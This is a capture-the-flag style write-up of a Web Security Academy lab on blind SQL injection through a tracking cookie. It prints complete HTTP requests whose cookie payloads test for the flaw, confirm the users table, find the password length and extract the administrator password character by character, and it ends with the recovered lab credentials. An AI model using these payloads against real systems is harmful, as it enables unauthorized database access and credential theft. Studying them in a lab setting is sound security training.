Blind SQL injection with conditional responses
Blind SQL injection with conditional responses
Solution
Check cookie TrackingId is vuln
Add ' to the Cookie
GET /product?productId=3 HTTP/2
Host: 0a51000803534e2a828b25bb001300b8.web-security-academy.net
Cookie: TrackingId=TNrzF4hwXlqGpFvk'; session=qAV2CzyzU4bEvrbmqm96Z3fScbOV5bKE
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a51000803534e2a828b25bb001300b8.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Confirm that there is a table called users
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users LIMIT 1)='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Confirm that there is a user called administrator
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users WHERE username='administrator')='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Check how long is password
Password is 20 characters
Enumerate from 1 to 20 chars
---
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>19)='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Enumerate password using Intruder
Enumerate password using Intruder and attack "Cluster bomb"
First we have to setup "Grep - Match"
---
GET /product?productId=4 HTTP/2
Host: 0ab100b90475d203800eb71c001c0038.web-security-academy.net
Cookie: TrackingId=LpcsNXPBz0yHypL7' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a; session=9pfK98d8TvLsFwoDqmeaTOa1EifBuJO1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab100b90475d203800eb71c001c0038.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
Password for user administator is: 4n9jtka5tq6dlgfke7t4
Login as user: administrator
L: administrator
P: 4n9jtka5tq6dlgfke7t4